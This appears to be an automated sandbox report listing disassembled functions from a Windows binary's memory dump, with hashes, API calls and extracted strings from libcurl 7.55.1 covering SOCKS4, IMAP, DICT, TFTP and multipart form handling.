Opcode ID: f8af60e26bbf9e9353ac676e8705e2b78d03617e423d5848820b054c67420cc7
Instruction ID: 0642a0fe383877c6481953a4c5cc1a8f0eaa7bc58a8c50cdef471d02fffcee60
Opcode Fuzzy Hash: f8af60e26bbf9e9353ac676e8705e2b78d03617e423d5848820b054c67420cc7
Instruction Fuzzy Hash: A2F1A172A09B4186EB50AB51E448BAEE365FF48794FC00235DE2D57BD4EF3C9148E398

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D47A78 Relevance: 38.6, APIs: 12, Strings: 10, Instructions: 139stringCOMMON

Download Yara Rule

APIs

isalpha.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D47AED
islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D47AFA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D47B35
strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D47B55
strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D47B75
strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D47B95

Strings

xdigit, xrefs: 00007FF7F8D47B8A
print, xrefs: 00007FF7F8D47BAA
digit, xrefs: 00007FF7F8D47B27
alpha, xrefs: 00007FF7F8D47B6A
space, xrefs: 00007FF7F8D47BE7
upper, xrefs: 00007FF7F8D47C21
alnum, xrefs: 00007FF7F8D47B4A
blank, xrefs: 00007FF7F8D47C04
lower, xrefs: 00007FF7F8D47C3E
graph, xrefs: 00007FF7F8D47BCA

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: strcmp$isalphaislower
String ID: alnum$alpha$blank$digit$graph$lower$print$space$upper$xdigit
API String ID: 3025443612-2602438971
Opcode ID: 7e865feae0c12ea4224ad9c2bedd7b3518bfa6a264da0b01f4e398956947213e
Instruction ID: c6755bf6984d8ba9d818ce01e31f5b5db0de4c526875c7783487a29316928a4f
Opcode Fuzzy Hash: 7e865feae0c12ea4224ad9c2bedd7b3518bfa6a264da0b01f4e398956947213e
Instruction Fuzzy Hash: 9F514121A0C64BD4FB10BB3584412FAD694AF18748FC944B1CE6E462C5EE6DE58DA3F8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D46F90 Relevance: 35.3, APIs: 16, Strings: 4, Instructions: 296COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00000001,?,?,?,?,00007FF7F8D42B6C), ref: 00007FF7F8D47063
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00000001,?,?,?,?,00007FF7F8D42B6C), ref: 00007FF7F8D470A9
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00000001,?,?,?,?,00007FF7F8D42B6C), ref: 00007FF7F8D4713D

Strings

=, xrefs: 00007FF7F8D46FEC
GSSAPI handshake failure (invalid security data), xrefs: 00007FF7F8D4714B
GSSAPI handshake failure (invalid security layer), xrefs: 00007FF7F8D4719C
GSSAPI handshake failure (empty security message), xrefs: 00007FF7F8D4711B, 00007FF7F8D473EC

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free
String ID: =$GSSAPI handshake failure (empty security message)$GSSAPI handshake failure (invalid security data)$GSSAPI handshake failure (invalid security layer)
API String ID: 1294909896-2174007834
Opcode ID: ffb4fe7d57d92b30506813198e0cd7f5dd71dc373befa7c958fb12a965e24189
Instruction ID: 20c6b047e53fe1d2c0ff23473fdc3b369b9d657654b4061417b7579b9143791c
Opcode Fuzzy Hash: ffb4fe7d57d92b30506813198e0cd7f5dd71dc373befa7c958fb12a965e24189
Instruction Fuzzy Hash: 8CD12E25B0DA46C6EB10EF65F85066CE3A4BF4CB84F880071DE2E57795DE3CE40997A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D0D41C Relevance: 35.3, APIs: 16, Strings: 4, Instructions: 266stringCOMMON

Download Yara Rule

APIs

isalpha.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?,00000000,?,?,00000001,00007FF7F8D0DA1E), ref: 00007FF7F8D0D45E
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,?,00000001,00007FF7F8D0DA1E), ref: 00007FF7F8D0D4AA
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,?,?,00000001,00007FF7F8D0DA1E), ref: 00007FF7F8D0D4BF
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,?,00000001,00007FF7F8D0DA1E), ref: 00007FF7F8D0D4C8
isdigit.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,00000001,00007FF7F8D0DA1E), ref: 00007FF7F8D0D5C4
isdigit.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,00000001,00007FF7F8D0DA1E), ref: 00007FF7F8D0D5EE
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,?,00000001,00007FF7F8D0DA1E), ref: 00007FF7F8D0D609
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,?,?,00000001,00007FF7F8D0DA1E), ref: 00007FF7F8D0D61F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,?,00000001,00007FF7F8D0DA1E), ref: 00007FF7F8D0D628
isdigit.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,00000001,00007FF7F8D0DA1E), ref: 00007FF7F8D0D667
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,?,00000001,00007FF7F8D0DA1E), ref: 00007FF7F8D0D675
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,?,?,00000001,00007FF7F8D0DA1E), ref: 00007FF7F8D0D68B
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,?,00000001,00007FF7F8D0DA1E), ref: 00007FF7F8D0D694
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,?,00000001,00007FF7F8D0DA1E), ref: 00007FF7F8D0D6AC
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,?,?,00000001,00007FF7F8D0DA1E), ref: 00007FF7F8D0D6C2
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,?,00000001,00007FF7F8D0DA1E), ref: 00007FF7F8D0D6CB

Part of subcall function 00007FF7F8D03018: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D03055

Strings

range overflow, xrefs: 00007FF7F8D0D5A7, 00007FF7F8D0D78E
bad range specification, xrefs: 00007FF7F8D0D79A
%c-%c%c, xrefs: 00007FF7F8D0D487
bad range, xrefs: 00007FF7F8D0D52E

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: _errno$strtoul$isdigit$__stdio_common_vsscanfisalpha
String ID: %c-%c%c$bad range$bad range specification$range overflow
API String ID: 229067821-566611384
Opcode ID: ddf05b2f87c185221f5ac8276fd8e9cdda087a67421b9681561f80f80d473db1
Instruction ID: fc534c9ce34c90eb07caa841334ca005ed9e842bc49a08dd13d735bd794d3262
Opcode Fuzzy Hash: ddf05b2f87c185221f5ac8276fd8e9cdda087a67421b9681561f80f80d473db1
Instruction Fuzzy Hash: 29B19E32A096868AE724AF25D444279F7A4FF09758F944132DA7E836C8DF3CE84CD764

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D114D4 Relevance: 33.6, APIs: 7, Strings: 12, Instructions: 322COMMON

Download Yara Rule

Strings

--%s--, xrefs: 00007FF7F8D11935
%s, xrefs: 00007FF7F8D1172B
--%sContent-Disposition: attachment, xrefs: 00007FF7F8D11692
couldn't open file "%s", xrefs: 00007FF7F8D118CC
, xrefs: 00007FF7F8D1175C
--%s, xrefs: 00007FF7F8D115AB
Content-Type: %s, xrefs: 00007FF7F8D11702
Content-Type: multipart/form-data, xrefs: 00007FF7F8D1154D
Content-Type: multipart/mixed; boundary=%s, xrefs: 00007FF7F8D11663
Content-Disposition: form-data; name=", xrefs: 00007FF7F8D115CB
--%s--, xrefs: 00007FF7F8D1196B
%s; boundary=%s, xrefs: 00007FF7F8D1155D

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID:
String ID: $%s$--%sContent-Disposition: attachment$--%s--$--%s--$Content-Type: %s$Content-Type: multipart/mixed; boundary=%s$%s; boundary=%s$--%s$Content-Disposition: form-data; name="$Content-Type: multipart/form-data$couldn't open file "%s"
API String ID: 0-530302859
Opcode ID: f0fe78a5b109b432ef6eae87b57558c0c21770917592a6f8c195466b02ab6343
Instruction ID: 9179319085dc403de24bb817d85f39dfd0ae4a3a6c13d68f442de36e1766d253
Opcode Fuzzy Hash: f0fe78a5b109b432ef6eae87b57558c0c21770917592a6f8c195466b02ab6343
Instruction Fuzzy Hash: 6DE17121A18E4391FF50AB6194406B9E398EF487A4FC06032EA6D47AD5EF3CE54DD3A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D3D6B0 Relevance: 33.2, APIs: 10, Strings: 12, Instructions: 234stringCOMMON

Download Yara Rule

APIs

strchr.LIBVCRUNTIME ref: 00007FF7F8D3D794
strchr.LIBVCRUNTIME ref: 00007FF7F8D3D805
strchr.LIBVCRUNTIME ref: 00007FF7F8D3D81A
strchr.LIBVCRUNTIME ref: 00007FF7F8D3D832
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D3D8B3
strchr.LIBVCRUNTIME ref: 00007FF7F8D3D8CC
strchr.LIBVCRUNTIME ref: 00007FF7F8D3D8E1
strchr.LIBVCRUNTIME ref: 00007FF7F8D3D8F9
strchr.LIBVCRUNTIME ref: 00007FF7F8D3D911
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D3D9AC

Strings

/LOOKUP:, xrefs: 00007FF7F8D3D77B
/MATCH:, xrefs: 00007FF7F8D3D6F3
CLIENT libcurl 7.55.1%sQUIT, xrefs: 00007FF7F8D3D7C6
/M:, xrefs: 00007FF7F8D3D711
/FIND:, xrefs: 00007FF7F8D3D72C
/D:, xrefs: 00007FF7F8D3D764
CLIENT libcurl 7.55.1MATCH %s %s %sQUIT, xrefs: 00007FF7F8D3D97D
CLIENT libcurl 7.55.1DEFINE %s %sQUIT, xrefs: 00007FF7F8D3D88C
lookup word is missing, xrefs: 00007FF7F8D3D849, 00007FF7F8D3D928
default, xrefs: 00007FF7F8D3D858, 00007FF7F8D3D937
/DEFINE:, xrefs: 00007FF7F8D3D749
Failed sending DICT request, xrefs: 00007FF7F8D3D7DB, 00007FF7F8D3D9B2

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: strchr$free
String ID: /D:$/DEFINE:$/FIND:$/LOOKUP:$/M:$/MATCH:$CLIENT libcurl 7.55.1%sQUIT$CLIENT libcurl 7.55.1DEFINE %s %sQUIT$CLIENT libcurl 7.55.1MATCH %s %s %sQUIT$Failed sending DICT request$default$lookup word is missing
API String ID: 3578582447-1471495957
Opcode ID: ecd379b2dec898cbacf7ef2c3cf6a6f6a07d7596a954545e58b8499558358c98
Instruction ID: 271b3dcda0c78ca6068cff61a6553532063633a4ebdb90d27613bb93a6fa7b26
Opcode Fuzzy Hash: ecd379b2dec898cbacf7ef2c3cf6a6f6a07d7596a954545e58b8499558358c98
Instruction Fuzzy Hash: E1919C51A0CA4241FB11BB61A5002B9E691AF4DB90FC84131DD2D8B7D5DF2CE90AF7E8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D301E0 Relevance: 31.8, APIs: 2, Strings: 16, Instructions: 297COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 00007FF7F8D302B1

Strings

Connection time-out, xrefs: 00007FF7F8D3024F
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client., xrefs: 00007FF7F8D305D1
SOCKS4%s request granted., xrefs: 00007FF7F8D30614
SOCKS4%s: connecting to HTTP proxy %s port %d, xrefs: 00007FF7F8D3028F
Too long SOCKS proxy name, can't use!, xrefs: 00007FF7F8D303E8
SOCKS4 communication to %s:%d, xrefs: 00007FF7F8D302BA
SOCKS4 connection to %s not supported, xrefs: 00007FF7F8D30381
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids., xrefs: 00007FF7F8D305AD
[, xrefs: 00007FF7F8D305E4
Failed to send SOCKS4 connect request., xrefs: 00007FF7F8D3064B
Failed to resolve "%s" for SOCKS4 connect., xrefs: 00007FF7F8D303A6
Failed to receive SOCKS4 connect request ack., xrefs: 00007FF7F8D30642
SOCKS4 reply has wrong version, version should be 4., xrefs: 00007FF7F8D3052A
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown., xrefs: 00007FF7F8D30585
SOCKS4 connect to IPv4 %s (locally resolved), xrefs: 00007FF7F8D30352
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed., xrefs: 00007FF7F8D305F5

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ioctlsocket
String ID: Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.$Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.$Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.$Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.$Connection time-out$Failed to receive SOCKS4 connect request ack.$Failed to resolve "%s" for SOCKS4 connect.$Failed to send SOCKS4 connect request.$SOCKS4 communication to %s:%d$SOCKS4 connect to IPv4 %s (locally resolved)$SOCKS4 connection to %s not supported$SOCKS4 reply has wrong version, version should be 4.$SOCKS4%s request granted.$SOCKS4%s: connecting to HTTP proxy %s port %d$Too long SOCKS proxy name, can't use!$[
API String ID: 3577187118-1987675181
Opcode ID: e2668e17cfdafc0678ae7534b03781d0882e57c36e1e924088ec48b4e9b66995
Instruction ID: d49f98ac1b57795af263cd0559a0bc6d889f78d87a65991e2ec07ef9cb81f1eb
Opcode Fuzzy Hash: e2668e17cfdafc0678ae7534b03781d0882e57c36e1e924088ec48b4e9b66995
Instruction Fuzzy Hash: A7C1FA62A0C78146FB54EB15E4002B9EB61FF89794FC40132E9AD07AD9CE3CE509F7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D3B580 Relevance: 31.7, APIs: 8, Strings: 13, Instructions: 184stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D3B736
strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D3B767
strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D3B77A
strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D3B78D
strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D3B7A0
strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D3B7B3
strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D3B7C6
strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D3B7D9

Strings

SEARCH, xrefs: 00007FF7F8D3B6AA, 00007FF7F8D3B783
UID, xrefs: 00007FF7F8D3B7BC
Unexpected continuation response, xrefs: 00007FF7F8D3B84D
SELECT, xrefs: 00007FF7F8D3B75D
NOOP, xrefs: 00007FF7F8D3B7CF
EXPUNGE, xrefs: 00007FF7F8D3B796
STORE, xrefs: 00007FF7F8D3B72F
LIST, xrefs: 00007FF7F8D3B6F5
Bad tagged response, xrefs: 00007FF7F8D3B651
LSUB, xrefs: 00007FF7F8D3B7A9
FETCH, xrefs: 00007FF7F8D3B6E5, 00007FF7F8D3B73F
EXAMINE, xrefs: 00007FF7F8D3B770
CAPABILITY, xrefs: 00007FF7F8D3B7F2

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: strcmp
String ID: Bad tagged response$CAPABILITY$EXAMINE$EXPUNGE$FETCH$LIST$LSUB$NOOP$SEARCH$SELECT$STORE$UID$Unexpected continuation response
API String ID: 1004003707-2330916320
Opcode ID: 541f1e47ed7f61a48b12b48a7e1fc0cecb5aae0e505ebeef26026d3e8ddb641f
Instruction ID: 9339b3790e9418a93ace6b78b3864b31d7c6e1b0af5d80f2a17c16a639924fea
Opcode Fuzzy Hash: 541f1e47ed7f61a48b12b48a7e1fc0cecb5aae0e505ebeef26026d3e8ddb641f
Instruction Fuzzy Hash: BA81A061A0D34341FB60BF15D5042B9E7519F09790FC85232DABE0A2D6EE2CE549F3B8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D3137C Relevance: 31.7, APIs: 2, Strings: 16, Instructions: 167stringCOMMON

Download Yara Rule

APIs

strtol.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F8D31490
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F8D3151C

Strings

%s (%ld), xrefs: 00007FF7F8D31594
blksize parsed from OACK, xrefs: 00007FF7F8D314C8
invalid blocksize value in OACK packet, xrefs: 00007FF7F8D315CA
requested, xrefs: 00007FF7F8D314CF
server requested blksize larger than allocated, xrefs: 00007FF7F8D3158D
%s (%ld), xrefs: 00007FF7F8D3152C
got option=(%s) value=(%s), xrefs: 00007FF7F8D31455
invalid tsize -:%s:- value in OACK packet, xrefs: 00007FF7F8D315D6
%s (%d), xrefs: 00007FF7F8D315B9
%s (%d) %s (%d), xrefs: 00007FF7F8D314E2
tsize, xrefs: 00007FF7F8D31500
blksize, xrefs: 00007FF7F8D31474
blksize is smaller than min supported, xrefs: 00007FF7F8D315A3
blksize is larger than max supported, xrefs: 00007FF7F8D315B2
tsize parsed from OACK, xrefs: 00007FF7F8D31525
Malformed ACK packet, rejecting, xrefs: 00007FF7F8D315E7

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: strtol
String ID: %s (%d)$%s (%d) %s (%d)$%s (%ld)$%s (%ld)$Malformed ACK packet, rejecting$blksize$blksize is larger than max supported$blksize is smaller than min supported$blksize parsed from OACK$got option=(%s) value=(%s)$invalid blocksize value in OACK packet$invalid tsize -:%s:- value in OACK packet$requested$server requested blksize larger than allocated$tsize$tsize parsed from OACK
API String ID: 76114499-895336422
Opcode ID: 24329aacf07bd1d84a1cfb50fd16510ce32a465471fe1df6617f4eb2384c70a9
Instruction ID: 885aa4052b9fe83f60fc6ed628b078de6fd6a91a9212062721abd40b2787efa1
Opcode Fuzzy Hash: 24329aacf07bd1d84a1cfb50fd16510ce32a465471fe1df6617f4eb2384c70a9
Instruction Fuzzy Hash: 0361A661A0C64396FF14EB15E4042B9E7A4AF48BD0FC44232E92E466D5DF3CE14DE3A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D0239C Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 120stringCOMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D023CB
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D023E5
strtok.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D02407
strtok.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D02422
__swprintf_l.LIBCMT ref: 00007FF7F8D02482
_access.API-MS-WIN-CRT-FILESYSTEM-L1-1-0 ref: 00007FF7F8D0248C
_mkdir.API-MS-WIN-CRT-FILESYSTEM-L1-1-0 ref: 00007FF7F8D02499
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D024AE
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D02517
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D02520

Strings

Cannot create directory %s because you exceeded your quota., xrefs: 00007FF7F8D024DF
You don't have permission to create %s., xrefs: 00007FF7F8D02503
No space left on the file system that will contain the directory %s., xrefs: 00007FF7F8D024FA
%s%s, xrefs: 00007FF7F8D0247B
%s resides on a read-only file system., xrefs: 00007FF7F8D024F1
Error creating directory %s., xrefs: 00007FF7F8D024D6
The directory name %s is too long., xrefs: 00007FF7F8D024E8

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: freestrtok$__swprintf_l_access_errno_mkdir_strdupmalloc
String ID: %s resides on a read-only file system.$%s%s$Cannot create directory %s because you exceeded your quota.$Error creating directory %s.$No space left on the file system that will contain the directory %s.$The directory name %s is too long.$You don't have permission to create %s.
API String ID: 234837967-1086585624
Opcode ID: 0bd26ad654f95e4d16006689a8c2a9cceb0cb8bb7eb0ef997ec9b8e1b546f735
Instruction ID: 2208d9db8eff308b61a4de5551a3744d2695470a36f1b156cc7c29b587c70982
Opcode Fuzzy Hash: 0bd26ad654f95e4d16006689a8c2a9cceb0cb8bb7eb0ef997ec9b8e1b546f735
Instruction Fuzzy Hash: 5B419121A0E74281EB16BB159454078EAA0AF5CBA0BD84271CD7D477D8DF3CE40DE3A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D0CBC0 Relevance: 28.7, APIs: 4, Strings: 15, Instructions: 165COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0CD17
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0CD74
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0CDB5

Part of subcall function 00007FF7F8D02C04: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D02C5C

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0CE3B

Strings

CURLFORM_COPYNAME, "%s",, xrefs: 00007FF7F8D0CCF8
curl_formadd(&post%d, &postend,, xrefs: 00007FF7F8D0CCDB
CURLFORM_CONTENTTYPE, "%s",, xrefs: 00007FF7F8D0CDCF
CURLFORM_FILE, "%s",, xrefs: 00007FF7F8D0CD38
CURLFORM_FILECONTENT, "%s",, xrefs: 00007FF7F8D0CD45
CURLOPT_HTTPPOST, xrefs: 00007FF7F8D0CE15
struct curl_httppost *post%d;, xrefs: 00007FF7F8D0CC12
CURLFORM_FILENAME, "%s",, xrefs: 00007FF7F8D0CD92
struct curl_httppost *postend;, xrefs: 00007FF7F8D0CCA2
postend = NULL;, xrefs: 00007FF7F8D0CCBF
CURLFORM_END);, xrefs: 00007FF7F8D0CDF1
post%d = NULL;, xrefs: 00007FF7F8D0CC47, 00007FF7F8D0CC80
CURLFORM_COPYCONTENTS, "%s",, xrefs: 00007FF7F8D0CD4E
curl_formfree(post%d);, xrefs: 00007FF7F8D0CC60
curl_easy_setopt(hnd, %s, post%d);, xrefs: 00007FF7F8D0CE1C

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free$malloc
